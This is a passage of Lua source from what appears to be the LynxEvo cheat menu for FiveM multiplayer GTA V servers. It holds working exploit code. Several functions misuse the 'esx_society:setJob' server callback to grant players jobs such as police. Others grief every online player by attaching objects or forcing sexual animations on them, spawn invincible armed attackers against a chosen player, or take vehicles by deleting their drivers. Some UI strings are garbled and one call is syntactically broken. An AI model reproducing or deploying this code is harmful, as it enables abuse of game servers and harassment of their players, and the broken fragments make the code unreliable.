  4957. if ESX then
  4958. ESX.TriggerServerCallback(
  4959. 'esx_society:getOnlinePlayers',
  4960. function(as)
  4961. local bG = nil
  4962. for i = 1, #as, 1 do
  4963. label = as[i].name
  4964. value = as[i].source
  4965. name = as[i].name
  4966. if name == GetPlayerName(bF) then
  4967. bG = as[i].identifier
  4968. debugLog('found ' .. as[i].name .. ' ' .. as[i].identifier)
  4969. end
  4970. identifier = as[i].identifier
  4971. end
  4972. ESX.TriggerServerCallback(
  4973. 'esx_society:setJob',
  4974. function()
  4975. end,
  4976. bG,
  4977. 'cardealer',
  4978. 3,
  4979. 'hire'
  4980. )
  4981. end
  4982. )
  4983. end
  4984. end
  4986. function RealEstateAgentPlayer(bF)
  4987. if ESX then
  4988. ESX.TriggerServerCallback(
  4989. 'esx_society:getOnlinePlayers',
  4990. function(as)
  4991. local bG = nil
  4992. for i = 1, #as, 1 do
  4993. label = as[i].name
  4994. value = as[i].source
  4995. name = as[i].name
  4996. if name == GetPlayerName(bF) then
  4997. bG = as[i].identifier
  4998. debugLog('found ' .. as[i].name .. ' ' .. as[i].identifier)
  4999. end
  5000. identifier = as[i].identifier
  5001. end
  5002. ESX.TriggerServerCallback(
  5003. 'esx_society:setJob',
  5004. function()
  5005. end,
  5006. bG,
  5007. 'realestateagent',
  5008. 3,
  5009. 'hire'
  5010. )
  5011. end
  5012. )
  5013. end
  5014. end
  5016. function TaxiPlayer(bF)
  5017. if ESX then
  5018. ESX.TriggerServerCallback(
  5019. 'esx_society:getOnlinePlayers',
  5020. function(as)
  5021. local bG = nil
  5022. for i = 1, #as, 1 do
  5023. label = as[i].name
  5024. value = as[i].source
  5025. name = as[i].name
  5026. if name == GetPlayerName(bF) then
  5027. bG = as[i].identifier
  5028. debugLog('found ' .. as[i].name .. ' ' .. as[i].identifier)
  5029. end
  5030. identifier = as[i].identifier
  5031. end
  5032. ESX.TriggerServerCallback(
  5033. 'esx_society:setJob',
  5034. function()
  5035. end,
  5036. bG,
  5037. 'taxi',
  5038. 3,
  5039. 'hire'
  5040. )
  5041. end
  5042. )
  5043. end
  5044. end
  5046. function AmbulancePlayer(bF)
  5047. if ESX then
  5048. ESX.TriggerServerCallback(
  5049. 'esx_society:getOnlinePlayers',
  5050. function(as)
  5051. local bG = nil
  5052. for i = 1, #as, 1 do
  5053. label = as[i].name
  5054. value = as[i].source
  5055. name = as[i].name
  5056. if name == GetPlayerName(bF) then
  5057. bG = as[i].identifier
  5058. debugLog('found ' .. as[i].name .. ' ' .. as[i].identifier)
  5059. end
  5060. identifier = as[i].identifier
  5061. end
  5062. ESX.TriggerServerCallback(
  5063. 'esx_society:setJob',
  5064. function()
  5065. end,
  5066. bG,
  5067. 'ambulance',
  5068. 3,
  5069. 'hire'
  5070. )
  5071. end
  5072. )
  5073. end
  5074. end
  5076. function PolicePlayer(bF)
  5077. if ESX then
  5078. ESX.TriggerServerCallback(
  5079. 'esx_society:getOnlinePlayers',
  5080. function(as)
  5081. local bG = nil
  5082. for i = 1, #as, 1 do
  5083. label = as[i].name
  5084. value = as[i].source
  5085. name = as[i].name
  5086. if name == GetPlayerName(bF) then
  5087. bG = as[i].identifier
  5088. debugLog('found ' .. as[i].name .. ' ' .. as[i].identifier)
  5089. end
  5090. identifier = as[i].identifier
  5091. end
  5092. ESX.TriggerServerCallback(
  5093. 'esx_society:setJob',
  5094. function()
  5095. end,
  5096. bG,
  5097. 'police',
  5098. 3,
  5099. 'hire'
  5100. )
  5101. end
  5102. )
  5103. end
  5104. end
  5106. function MecanoPlayer(bF)
  5107. if ESX then
  5108. ESX.TriggerServerCallback(
  5109. 'esx_society:getOnlinePlayers',
  5110. function(as)
  5111. local bG = nil
  5112. for i = 1, #as, 1 do
  5113. label = as[i].name
  5114. value = as[i].source
  5115. name = as[i].name
  5116. if name == GetPlayerName(bF) then
  5117. bG = as[i].identifier
  5118. debugLog('found ' .. as[i].name .. ' ' .. as[i].identifier)
  5119. end
  5120. identifier = as[i].identifier
  5121. end
  5122. ESX.TriggerServerCallback(
  5123. 'esx_society:setJob',
  5124. function()
  5125. end,
  5126. bG,
  5127. 'mecano',
  5128. 3,
  5129. 'hire'
  5130. )
  5131. end
  5132. )
  5133. end
  5134. end
  5136. function bananapartyall()
  5137. Citizen.CreateThread(
  5138. function()
  5140. for i = 0, 128 do
  5141. local bH = CreateObject(GetHashKey('p_crahsed_heli_s'), 0, 0, 0, true, true, true)
  5142. local bI = CreateObject(GetHashKey('prop_rock_4_big2'), 0, 0, 0, true, true, true)
  5143. local bJ = CreateObject(GetHashKey('prop_beachflag_le'), 0, 0, 0, true, true, true)
  5144. AttachEntityToEntity(
  5145. bH,
  5146. GetPlayerPed(i),
  5147. GetPedBoneIndex(GetPlayerPed(i), 57005),
  5148. 0.4,
  5149. 0,
  5150. 0,
  5151. 0,
  5152. 270.0,
  5153. 60.0,
  5154. true,
  5155. true,
  5156. false,
  5157. true,
  5158. 1,
  5159. true
  5160. )
  5161. AttachEntityToEntity(
  5162. bI,
  5163. GetPlayerPed(i),
  5164. GetPedBoneIndex(GetPlayerPed(i), 57005),
  5165. 0.4,
  5166. 0,
  5167. 0,
  5168. 0,
  5169. 270.0,
  5170. 60.0,
  5171. true,
  5172. true,
  5173. false,
  5174. true,
  5175. 1,
  5176. true
  5177. )
  5178. AttachEntityToEntity(
  5179. bJ,
  5180. GetPlayerPed(i),
  5181. GetPedBoneIndex(GetPlayerPed(i), 57005),
  5182. 0.4,
  5183. 0,
  5184. 0,
  5185. 0,
  5186. 270.0,
  5187. 60.0,
  5188. true,
  5189. true,
  5190. false,
  5191. true,
  5192. 1,
  5193. true
  5194. )
  5195. end
  5196. end
  5197. )
  5198. end
  5200. function RespawnPed(ped, bK, bL)
  5201. SetEntityCoordsNoOffset(ped, bK.x, bK.y, bK.z, false, false, false, true)
  5202. NetworkResurrectLocalPlayer(bK.x, bK.y, bK.z, bL, true, false)
  5203. SetPlayerInvincible(ped, false)
  5204. TriggerEvent('playerSpawned', bK.x, bK.y, bK.z)
  5205. ClearPedBloodDamage(ped)
  5206. end
  5207. local function bM(ad)
  5208. local bN = NetworkGetNetworkIdFromEntity(ped)
  5209. local bO = 0
  5210. NetworkRequestControlOfNetworkId(bN)
  5211. while not NetworkHasControlOfNetworkId(bN) do
  5212. Citizen.Wait(1)
  5213. NetworkRequestControlOfNetworkId(bN)
  5214. bO = bO + 1
  5215. if bO == 5000 then
  5216. Citizen.Trace('Control failed')
  5217. break
  5218. end
  5219. end
  5220. end
  5221. local function bP(bQ, bR)
  5222. for i = 0, 10 do
  5223. local bK = GetEntityCoords(GetPlayerPed(SelectedPlayer))
  5224. RequestModel(GetHashKey(bQ))
  5225. Citizen.Wait(50)
  5226. if HasModelLoaded(GetHashKey(bQ)) then
  5227. local ped =
  5228. CreatePed(21, GetHashKey(bQ), bK.x + i, bK.y - i, bK.z, 0, true, false) and
  5229. CreatePed(21, GetHashKey(bQ), bK.x - i, bK.y + i, bK.z, 0, true, false)
  5230. if DoesEntityExist(ped) and not IsEntityDead(GetPlayerPed(SelectedPlayer)) then
  5231. bM(ped)
  5232. GiveWeaponToPed(ped, GetHashKey(bR), 9999, 1, 1)
  5233. SetEntityInvincible(ped, true)
  5234. SetPedCanSwitchWeapon(ped, true)
  5235. TaskCombatPed(ped, GetPlayerPed(SelectedPlayer), 0, 16)
  5236. elseif IsEntityDead(GetPlayerPed(SelectedPlayer)) then
  5237. TaskCombatHatedTargetsInArea(ped, bK.x, bK.y, bK.z, 500)
  5238. else
  5239. Citizen.Wait(0)
  5240. end
  5241. end
  5242. end
  5243. end
  5245. function RapeAllFunc()
  5247. Citizen.CreateThread(
  5248. function()
  5249. for i = 0, 128 do
  5250. RequestModelSync('a_m_o_acult_01')
  5251. RequestAnimDict('rcmpaparazzo_2')
  5252. while not HasAnimDictLoaded('rcmpaparazzo_2') do
  5253. Citizen.Wait(0)
  5254. end
  5255. if IsPedInAnyVehicle(GetPlayerPed(i), true) then
  5256. local veh = GetVehiclePedIsIn(GetPlayerPed(i), true)
  5257. while not NetworkHasControlOfEntity(veh) do
  5258. NetworkRequestControlOfEntity(veh)
  5259. Citizen.Wait(0)
  5260. end
  5261. SetEntityAsMissionEntity(veh, true, true)
  5262. DeleteVehicle(veh)
  5263. DeleteEntity(veh)
  5264. end
  5265. count = -0.2
  5266. for b = 1, 3 do
  5267. local x, y, z = table.unpack(GetEntityCoords(GetPlayerPed(i), true))
  5268. local bS = CreatePed(4, GetHashKey('a_m_o_acult_01'), x, y, z, 0.0, true, false)
  5269. SetEntityAsMissionEntity(bS, true, true)
  5270. AttachEntityToEntity(
  5271. bS,
  5272. GetPlayerPed(i),
  5273. 4103,
  5274. 11816,
  5275. count,
  5276. 0.00,
  5277. 0.0,
  5278. 0.0,
  5279. 0.0,
  5280. 0.0,
  5281. false,
  5282. false,
  5283. false,
  5284. false,
  5285. 2,
  5286. true
  5287. )
  5288. ClearPedTasks(GetPlayerPed(i))
  5289. TaskPlayAnim(GetPlayerPed(i), 'rcmpaparazzo_2', 'shag_loop_poppy', 2.0, 2.5, -1, 49, 0, 0, 0, 0)
  5290. SetPedKeepTask(bS)
  5291. TaskPlayAnim(bS, 'rcmpaparazzo_2', 'shag_loop_a', 2.0, 2.5, -1, 49, 0, 0, 0, 0)
  5292. SetEntityInvincible(bS, true)
  5293. count = count - 0.4
  5294. end
  5295. end
  5296. end
  5297. )
  5298. end
  5299. local function bT()
  5300. local bU = KeyboardInput('Enter X pos', '', 100)
  5301. local bV = KeyboardInput('Enter Y pos', '', 100)
  5302. local bW = KeyboardInput('Enter Z pos', '', 100)
  5303. if bU ~= '' and bV ~= '' and bW ~= '' then
  5304. if
  5305. IsPedInAnyVehicle(GetPlayerPed(-1), 0) and
  5306. GetPedInVehicleSeat(GetVehiclePedIsIn(GetPlayerPed(-1), 0), -1) == GetPlayerPed(-1)
  5307. then
  5308. entity = GetVehiclePedIsIn(GetPlayerPed(-1), 0)
  5309. else
  5310. entity = GetPlayerPed(-1)
  5311. end
  5312. if entity then
  5313. SetEntityCoords(entity, bU + 0.5, bV + 0.5, bW + 0.5, 1, 0, 0, 1)
  5314. av('~g~Teleported to coords!', false)
  5315. end
  5316. else
  5317. av('~b~Invalid coords!', true)
  5318. end
  5319. end
  5320. local function bX()
  5321. local name = KeyboardInput('Enter Blip Name', '', 100)
  5322. if name == '' then
  5323. av('~b~Invalid Blip Name!', true)
  5324. return bX()
  5325. else
  5326. local bU = KeyboardInput('Enter X pos', '', 100)
  5327. local bV = KeyboardInput('Enter Y pos', '', 100)
  5328. local bW = KeyboardInput('Enter Z pos', '', 100)
  5329. if bU ~= '' and bV ~= '' and bW ~= '' then
  5330. local bY = {
  5331. {
  5332. colour = 75,
  5333. id = 84
  5334. }
  5335. }
  5336. for _, bZ in pairs(bY) do
  5337. bZ.blip = AddBlipForCoord(bU + 0.5, bV + 0.5, bW + 0.5)
  5338. SetBlipSprite(bZ.blip,
  5339. SetBlipDisplay(bZ.blip, 4)
  5340. SetBlipScale(bZ.blip, 0.9)
  5341. SetBlipColour(bZ.blip, bZ.colour)
  5342. SetBlipAsShortRange(bZ.blip, true)
  5343. BeginTextCommandSetBlipName('STRING')
  5344. AddTextComponentString(name)
  5345. EndTextCommandSetBlipName(bZ.blip)
  5346. end
  5347. else
  5348. av('~b~Invalid coords!', true)
  5349. end
  5350. end
  5351. end
  5352. local function b_()
  5353. local ax = GetPlayerPed(-1)
  5354. local c0 = GetEntityCoords(ax, true)
  5355. local c1 = GetClosestVehicle(GetEntityCoords(ax, true), 1000.0, 0, 4)
  5356. local c2 = GetEntityCoords(c1, true)
  5357. local c3 = GetClosestVehicle(GetEntityCoords(ax, true), 1000.0, 0, 16384)
  5358. local c4 = GetEntityCoords(c3, true)
  5359. av('~y~Wait...', false)
  5360. Citizen.Wait(1000)
  5361. if c1 == 0 and c3 == 0 then
  5362. av('~b~No Vehicle Found', true)
  5363. elseif c1 == 0 and c3 ~= 0 then
  5364. if IsVehicleSeatFree(c3, -1) then
  5365. SetPedIntoVehicle(ax, c3, -1)
  5366. SetVehicleAlarm(c3, false)
  5367. SetVehicleDoorsLocked(c3, 1)
  5368. SetVehicleNeedsToBeHotwired(c3, false)
  5369. else
  5370. local c5 = GetPedInVehicleSeat(c3, -1)
  5371. ClearPedTasksImmediately(c5)
  5372. SetEntityAsMissionEntity(c5, 1, 1)
  5373. DeleteEntity(c5)
  5374. SetPedIntoVehicle(ax, c3, -1)
  5375. SetVehicleAlarm(c3, false)
  5376. SetVehicleDoorsLocked(c3, 1)
  5377. SetVehicleNeedsToBeHotwired(c3, false)
  5378. end
  5379. av('~g~Teleported Into Nearest Vehicle!', false)
  5380. elseif c1 ~= 0 and c3 == 0 then
  5381. if IsVehicleSeatFree(c1, -1) then
  5382. SetPedIntoVehicle(ax, c1, -1)
  5383. SetVehicleAlarm(c1, false)
  5384. SetVehicleDoorsLocked(c1, 1)
  5385. SetVehicleNeedsToBeHotwired(c1, false)
  5386. else
  5387. local c5 = GetPedInVehicleSeat(c1, -1)
  5388. ClearPedTasksImmediately(c5)
  5389. SetEntityAsMissionEntity(c5, 1, 1)
  5390. DeleteEntity(c5)
  5391. SetPedIntoVehicle(ax, c1, -1)
  5392. SetVehicleAlarm(c1, false)
  5393. SetVehicleDoorsLocked(c1, 1)
  5394. SetVehicleNeedsToBeHotwired(c1, false)
  5395. end
  5396. av('~g~Teleported Into Nearest Vehicle!', false)
  5397. elseif c1 ~= 0 and c3 ~= 0 then
  5398. if Vdist(c2.x, c2.y, c2.z, c0.x, c0.y, c0.z) < Vdist(c4.x, c4.y, c4.z, c0.x, c0.y, c0.z) then
  5399. if IsVehicleSeatFree(c1, -1) then
  5400. SetPedIntoVehicle(ax, c1, -1)
  5401. SetVehicleAlarm(c1, false)
  5402. SetVehicleDoorsLocked(c1, 1)
  5403. SetVehicleNeedsToBeHotwired(c1, false)
  5404. else
  5405. local c5 = GetPedInVehicleSeat(c1, -1)
  5406. ClearPedTasksImmediately(c5)
  5407. SetEntityAsMissionEntity(c5, 1, 1)
  5408. DeleteEntity(c5)
  5409. SetPedIntoVehicle(ax, c1, -1)
  5410. SetVehicleAlarm(c1, false)
  5411. SetVehicleDoorsLocked(c1, 1)
  5412. SetVehicleNeedsToBeHotwired(c1, false)
  5413. end
  5414. elseif Vdist(c2.x, c2.y, c2.z, c0.x, c0.y, c0.z) > Vdist(c4.x, c4.y, c4.z, c0.x, c0.y, c0.z) then
  5415. if IsVehicleSeatFree(c3, -1) then
  5416. SetPedIntoVehicle(ax, c3, -1)
  5417. SetVehicleAlarm(c3, false)
  5418. SetVehicleDoorsLocked(c3, 1)
  5419. SetVehicleNeedsToBeHotwired(c3, false)
  5420. else
  5421. local c5 = GetPedInVehicleSeat(c3, -1)
  5422. ClearPedTasksImmediately(c5)
  5423. SetEntityAsMissionEntity(c5, 1, 1)
  5424. DeleteEntity(c5)
  5425. SetPedIntoVehicle(ax, c3, -1)
  5426. SetVehicleAlarm(c3, false)
  5427. SetVehicleDoorsLocked(c3, 1)
  5428. SetVehicleNeedsToBeHotwired(c3, false)
  5429. end
  5430. end
  5431. av('~g~Teleported Into Nearest Vehicle!', false)
  5432. end
  5433. end
  5434. local function c6()
  5435. if DoesBlipExist(GetFirstBlipInfoId(8)) then
  5436. local c7 = GetBlipInfoIdIterator(8)
  5437. local blip = GetFirstBlipInfoId(8, c7)
  5438. WaypointCoords = Citizen.InvokeNative(0xFA7C7F0AADF25D09, blip, Citizen.ResultAsVector())
  5439. wp = true
  5440. else
  5441. av('~b~No waypoint!', true)
  5442. end
  5443. local c8 = 0.0
  5444. height = 1000.0
  5445. while wp do
  5446. Citizen.Wait(0)
  5447. if wp then
  5448. if
  5449. IsPedInAnyVehicle(GetPlayerPed(-1), 0) and
  5450. GetPedInVehicleSeat(GetVehiclePedIsIn(GetPlayerPed(-1), 0), -1) == GetPlayerPed(-1)
  5451. then
  5452. entity = GetVehiclePedIsIn(GetPlayerPed(-1), 0)
  5453. else
  5454. entity = GetPlayerPed(-1)
  5455. end
  5456. SetEntityCoords(entity, WaypointCoords.x, WaypointCoords.y, height)
  5457. FreezeEntityPosition(entity, true)
  5458. local c9 = GetEntityCoords(entity, true)
  5459. if c8 == 0.0 then
  5460. height = height - 25.0
  5461. SetEntityCoords(entity, c9.x, c9.y, height)
  5462. bool, c8 = GetGroundZFor_3dCoord(c9.x, c9.y, c9.z, 0)
  5463. else
  5464. SetEntityCoords(entity, c9.x, c9.y, c8)
  5465. FreezeEntityPosition(entity, false)
  5466. wp = false
  5467. height = 1000.0
  5468. c8 = 0.0
  5469. av('~g~Teleported to waypoint!', false)
  5470. break
  5471. end
  5472. end
  5473. end
  5474. end
  5475. local function ca()
  5476. local cb = KeyboardInput('?뚰솚??李⑤웾 ?대쫫 ?곸뼱留?媛€??ex)jet, rhino', '', 100)
  5477. if cb and IsModelValid(cb) and IsModelAVehicle(cb) then
  5478. RequestModel(cb)
  5479. while not HasModelLoaded(cb) do
  5480. Citizen.Wait(0)
  5481. end
  5482. local veh =
  5483. CreateVehicle(
  5484. GetHashKey(cb),
  5485. GetEntityCoords(PlayerPedId(-1)),
  5486. GetEntityHeading(PlayerPedId(-1)),
  5487. true,
  5488. true
  5489. )
  5490. SetPedIntoVehicle(PlayerPedId(-1), veh, -1)
  5491. else
  5492. av('~b~~h~?대떦 李⑤웾???놁뒿?덈떎! ?대쫫???뺤씤?댁<?몄슂.', true)
  5493. end
  5494. end
  5495. local function cc()
  5496. SetVehicleFixed(GetVehiclePedIsIn(GetPlayerPed(-1), false))
  5497. SetVehicleDirtLevel(GetVehiclePedIsIn(GetPlayerPed(-1), false), 0.0)
  5498. SetVehicleLights(GetVehiclePedIsIn(GetPlayerPed(-1), false), 0)
  5499. SetVehicleBurnout(GetVehiclePedIsIn(GetPlayerPed(-1), false), false)
  5500. Citizen.InvokeNative(0x1FD09E7390A74D54, GetVehiclePedIsIn(GetPlayerPed(-1), false), 0)
  5501. SetVehicleUndriveable(vehicle, false)
  5502. end
  5503. local function cd()
  5504. SetVehicleEngineHealth(vehicle, 1000)
  5505. Citizen.InvokeNative(0x1FD09E7390A74D54, GetVehiclePedIsIn(GetPlayerPed(-1), false), 0)
  5506. SetVehicleUndriveable(vehicle, false)
  5507. end
  5508. local function ce()
  5509. LynxEvo.StartRC()
  5510. end
  5511. LynxEvo.StartRC = function()
  5512. if DoesEntityExist(LynxEvo.Entity) then
  5513. return
  5514. end
  5515. LynxEvo.SpawnRC()
  5516. LynxEvo.Tablet(true)
  5517. while DoesEntityExist(LynxEvo.Entity) and DoesEntityExist(LynxEvo.Driver) do
  5518. Citizen.Wait(5)
  5519. local cf = GetDistanceBetweenCoords(GetEntityCoords(PlayerPedId()), GetEntityCoords(LynxEvo.Entity), true)
  5520. LynxEvo.DrawInstructions(cf)
  5521. LynxEvo.HandleKeys(cf)
  5522. if cf <= 3000.0 then
  5523. if not NetworkHasControlOfEntity(LynxEvo.Driver) then
  5524. NetworkRequestControlOfEntity(LynxEvo.Driver)
  5525. elseif not NetworkHasControlOfEntity(LynxEvo.Entity) then
  5526. NetworkRequestControlOfEntity(LynxEvo.Entity)
  5527. end
  5528. else
  5529. TaskVehicleTempAction(LynxEvo.Driver, LynxEvo.Entity, 6, 2500)
  5530. end
  5531. end
  5532. end
  5533. LynxEvo.HandleKeys = function(cf)
  5534. if IsControlJustReleased(0, 47) then
  5535. if IsCamRendering(LynxEvo.Camera) then
  5536. LynxEvo.ToggleCamera(false)
  5537. else
  5538. LynxEvo.ToggleCamera(true)
  5539. end
  5540. end
  5541. if cf <= 3.0 then
  5542. if IsControlJustPressed(0, 38) then
  5543. LynxEvo.Attach('pick')
  5544. end
  5545. end
  5546. if cf < 3000.0 then
  5547. if IsControlPressed(0, 172) and not IsControlPressed(0, 173) then
  5548. TaskVehicleTempAction(LynxEvo.Driver, LynxEvo.Entity, 9, 1)
  5549. end
  5550. if IsControlJustReleased(0, 172) or IsControlJustReleased(0, 173) then
  5551. TaskVehicleTempAction(LynxEvo.Driver, LynxEvo.Entity, 6, 2500)
  5552. end
  5553. if IsControlPressed(0, 173) and not IsControlPressed(0, 172) then
  5554. TaskVehicleTempAction(LynxEvo.Driver, LynxEvo.Entity, 22, 1)
  5555. end
  5556. if IsControlPressed(0, 174) and IsControlPressed(0, 173) then
  5557. TaskVehicleTempAction(LynxEvo.Driver, LynxEvo.Entity, 13, 1)
  5558. end
  5559. if IsControlPressed(0, 175) and IsControlPressed(0, 173) then
  5560. TaskVehicleTempAction(LynxEvo.Driver, LynxEvo.Entity, 14, 1)
  5561. end
  5562. if IsControlPressed(0, 172) and IsControlPressed(0, 173) then
  5563. TaskVehicleTempAction(LynxEvo.Driver, LynxEvo.Entity, 30, 100)
  5564. end
  5565. if IsControlPressed(0, 174) and IsControlPressed(0, 172) then
  5566. TaskVehicleTempAction(LynxEvo.Driver, LynxEvo.Entity, 7, 1)
  5567. end
  5568. if IsControlPressed(0, 175) and IsControlPressed(0, 172) then
  5569. TaskVehicleTempAction(LynxEvo.Driver, LynxEvo.Entity, 8, 1)
  5570. end
  5571. if IsControlPressed(0, 174) and not IsControlPressed(0, 172) and not IsControlPressed(0, 173) then
  5572. TaskVehicleTempAction(LynxEvo.Driver, LynxEvo.Entity, 4, 1)
  5573. end
  5574. if IsControlPressed(0, 175) and not IsControlPressed(0, 172) and not IsControlPressed(0, 173) then
  5575. TaskVehicleTempAction(LynxEvo.Driver, LynxEvo.Entity, 5, 1)
  5576. end
  5577. if IsControlJustReleased(0, 168) then
  5578. SetVehicleEngineOn(LynxEvo.Entity, not GetIsVehicleEngineRunning(LynxEvo.Entity), false, true)
  5579. end
  5580. end
  5581. end
  5582. LynxEvo.DrawInstructions = function(cf)
  5583. local cg = {
  5584. {
  5585. ['label'] = 'Right',
  5586. ['button'] = '~INPUT_CELLPHONE_RIGHT~'
  5587. },
  5588. {
  5589. ['label'] = 'Forward',
  5590. ['button'] = '~INPUT_CELLPHONE_UP~'
  5591. },
  5592. {
  5593. ['label'] = 'Reverse',
  5594. ['button'] = '~INPUT_CELLPHONE_DOWN~'
  5595. },
  5596. {
  5597. ['label'] = 'Left',
  5598. ['button'] = '~INPUT_CELLPHONE_LEFT~'
  5599. }
  5600. }
  5601. local ch = {
  5602. ['label'] = 'Delete Car',
  5603. ['button'] = '~INPUT_CONTEXT~'
  5604. }
  5605. local cj = {
  5606. {
  5607. ['label'] = 'Toggle Camera',
  5608. ['button'] = '~INPUT_DETONATE~'
  5609. },
  5610. {
  5611. ['label'] = 'Start/Stop Engine',
  5612. ['button'] = '~INPUT_SELECT_CHARACTER_TREVOR~'
  5613. }
  5614. }
  5615. if cf <= 3000.0 then
  5616. for ck = 1, #cg do
  5617. local cl = cg[ck]
  5618. table.insert(cj, cl)
  5619. end
  5620. if cf <= 3000.0 then
  5621. table.insert(cj, ch)
  5622. end
  5623. end
  5624. Citizen.CreateThread(
  5625. function()
  5626. local cm = RequestScaleformMovie('instructional_buttons')
  5627. while not HasScaleformMovieLoaded(cm) do
  5628. Wait(0)
  5629. end
  5630. PushScaleformMovieFunction(cm, 'CLEAR_ALL')
  5631. PushScaleformMovieFunction(cm, 'TOGGLE_MOUSE_BUTTONS')
  5632. PushScaleformMovieFunctionParameterBool(0)
  5633. PopScaleformMovieFunctionVoid()
  5634. for ck, cn in ipairs(cj) do
  5635. PushScaleformMovieFunction(cm, 'SET_DATA_SLOT')
  5636. PushScaleformMovieFunctionParameterInt(ck - 1)
  5637. PushScaleformMovieMethodParameterButtonName(cn['button'])
  5638. PushScaleformMovieFunctionParameterString(cn['label'])
  5639. PopScaleformMovieFunctionVoid()
  5640. end
  5641. PushScaleformMovieFunction(cm, 'DRAW_INSTRUCTIONAL_BUTTONS')
  5642. PushScaleformMovieFunctionParameterInt(-1)
  5643. PopScaleformMovieFunctionVoid()
  5644. DrawScaleformMovieFullscreen(cm, 255, 255, 255, 255)
  5645. end
  5646. )
  5647. end
  5648. LynxEvo.SpawnRC = function()
  5649. local cb = KeyboardInput('?뚰솚??李⑤웾 ?대쫫 ?곸뼱留?媛€??ex)jet, rhino', '', 100)
  5650. if cb and IsModelValid(cb) and IsModelAVehicle(cb) then
  5651. RequestModel(cb)
  5652. while not HasModelLoaded(cb) do
  5653. Citizen.Wait(0)
  5654. end
  5655. LynxEvo.LoadModels(
  5656. {
  5657. GetHashKey(cb),
  5658. 68070371
  5659. }
  5660. )
  5661. local co, cp =
  5662. GetEntityCoords(PlayerPedId()) + GetEntityForwardVector(PlayerPedId()) * 2.0,
  5663. GetEntityHeading(PlayerPedId())
  5664. LynxEvo.Entity = CreateVehicle(GetHashKey(cb), co, cp, true)
  5665. while not DoesEntityExist(LynxEvo.Entity) do
  5666. Citizen.Wait(5)
  5667. end
  5668. LynxEvo.Driver = CreatePed(5, 68070371, co, cp, true)
  5669. SetEntityInvincible(LynxEvo.Driver, true)
  5670. SetEntityVisible(LynxEvo.Driver, false)
  5671. FreezeEntityPosition(LynxEvo.Driver, true)
  5672. SetPedAlertness(LynxEvo.Driver, 0.0)
  5673. TaskWarpPedIntoVehicle(LynxEvo.Driver, LynxEvo.Entity, -1)
  5674. while not IsPedInVehicle(LynxEvo.Driver, LynxEvo.Entity) do
  5675. Citizen.Wait(0)
  5676. end
  5677. LynxEvo.Attach('place')
  5678. av('~g~~h~Success', false)
  5679. else
  5680. av('~b~~h~?대떦 李⑤웾???놁뒿?덈떎! ?대쫫???뺤씤?댁<?몄슂.', true)
  5681. end
  5682. end
  5683. LynxEvo.Attach = function(aw)
  5684. if not DoesEntityExist(LynxEvo.Entity) then
  5685. return
  5686. end
  5687. LynxEvo.LoadModels(
  5688. {
  5689. 'pickup_object'
  5690. }
  5691. )
  5692. if aw == 'place' then
  5693. AttachEntityToEntity(
  5694. LynxEvo.Entity,
  5695. PlayerPedId(),
  5696. GetPedBoneIndex(PlayerPedId(), 28422),
  5697. 3.0,
  5698. 0.0,
  5699. 0.5,
  5700. 70.0,
  5701. 0.0,
  5702. 270.0,
  5703. 1,
  5704. 1,
  5705. 0,
  5706. 0,
  5707. 2,
  5708. 1
  5709. )
  5710. Citizen.Wait(200)
  5711. DetachEntity(LynxEvo.Entity, false, true)
  5712. PlaceObjectOnGroundProperly(LynxEvo.Entity)
  5713. elseif aw == 'pick' then
  5714. if DoesCamExist(LynxEvo.Camera) then
  5715. LynxEvo.ToggleCamera(false)
  5716. end
  5717. LynxEvo.Tablet(false)
  5718. Citizen.Wait(100)
  5719. DetachEntity(LynxEvo.Entity)
  5720. DeleteVehicle(LynxEvo.Entity)
  5721. DeleteEntity(LynxEvo.Driver)
  5722. LynxEvo.UnloadModels()
  5723. end
  5724. end
  5725. LynxEvo.Tablet = function(cq)
  5726. if cq then
  5727. LynxEvo.LoadModels(
  5728. {
  5729. GetHashKey('prop_cs_tablet')
  5730. }
  5731. )
  5732. LynxEvo.LoadModels(
  5733. {
  5734. 'amb@code_human_in_bus_passenger_idles@female@tablet@idle_a'
  5735. }
  5736. )
  5737. Citizen.CreateThread(
  5738. function()
  5739. while DoesEntityExist(LynxEvo.TabletEntity) do
  5740. Citizen.Wait(5)
  5741. if
  5742. not IsEntityPlayingAnim(
  5743. PlayerPedId(),
  5744. 'amb@code_human_in_bus_passenger_idles@female@tablet@idle_a',
  5745. 'idle_a',
  5746. 3
  5747. )
  5748. then
  5749. end
  5750. end
  5751. ClearPedTasks(PlayerPedId())
  5752. end
  5753. )
  5754. else
  5755. DeleteEntity(LynxEvo.TabletEntity)
  5756. end
  5757. end
  5758. LynxEvo.ToggleCamera = function(cq)
  5759. if not true then
  5760. return
  5761. end
  5762. if cq then
  5763. if not DoesEntityExist(LynxEvo.Entity) then
  5764. return
  5765. end
  5766. if DoesCamExist(LynxEvo.Camera) then
  5767. DestroyCam(LynxEvo.Camera)
  5768. end
  5769. LynxEvo.Camera = CreateCam('DEFAULT_SCRIPTED_CAMERA', true)
  5770. AttachCamToEntity(LynxEvo.Camera, LynxEvo.Entity, 0.0, 0.0, 0.4, true)
  5771. Citizen.CreateThread(
  5772. function()
  5773. while DoesCamExist(LynxEvo.Camera) do
  5774. Citizen.Wait(5)
  5775. SetCamRot(LynxEvo.Camera, GetEntityRotation(LynxEvo.Entity))
  5776. end
  5777. end
  5778. )
  5779. local cr =
  5780. 500 *
  5781. math.ceil(
  5782. GetDistanceBetweenCoords(GetEntityCoords(PlayerPedId()), GetEntityCoords(LynxEvo.Entity), true) / 10
  5783. )
  5784. RenderScriptCams(1, 1, cr, 1, 1)
  5785. Citizen.Wait(cr)
  5786. SetTimecycleModifier('scanline_cam_cheap')
  5787. SetTimecycleModifierStrength(2.0)
  5788. else
  5789. local cr =
  5790. 500 *
  5791. math.ceil(
  5792. GetDistanceBetweenCoords(GetEntityCoords(PlayerPedId()), GetEntityCoords(LynxEvo.Entity), true) / 10
  5793. )
  5794. RenderScriptCams(0, 1, cr, 1, 0)
  5795. Citizen.Wait(cr)
  5796. ClearTimecycleModifier()
  5797. DestroyCam(LynxEvo.Camera)
  5798. end
  5799. end
  5800. LynxEvo.LoadModels = function(cs)
  5801. for ct = 1, #cs do
  5802. local bB = cs[ct]
  5803. if not LynxEvo.CachedModels then
  5804. LynxEvo.CachedModels = {}
  5805. end
  5806. table.insert(LynxEvo.CachedModels, bB)
  5807. if IsModelValid(bB) then
  5808. while not HasModelLoaded(bB) do
  5809. RequestModel(bB)
  5810. Citizen.Wait(10)
  5811. end
  5812. else
  5813. while not HasAnimDictLoaded(bB) do
  5814. RequestAnimDict(bB)
  5815. Citizen.Wait(10)
  5816. end
  5817. end
  5818. end
  5819. end
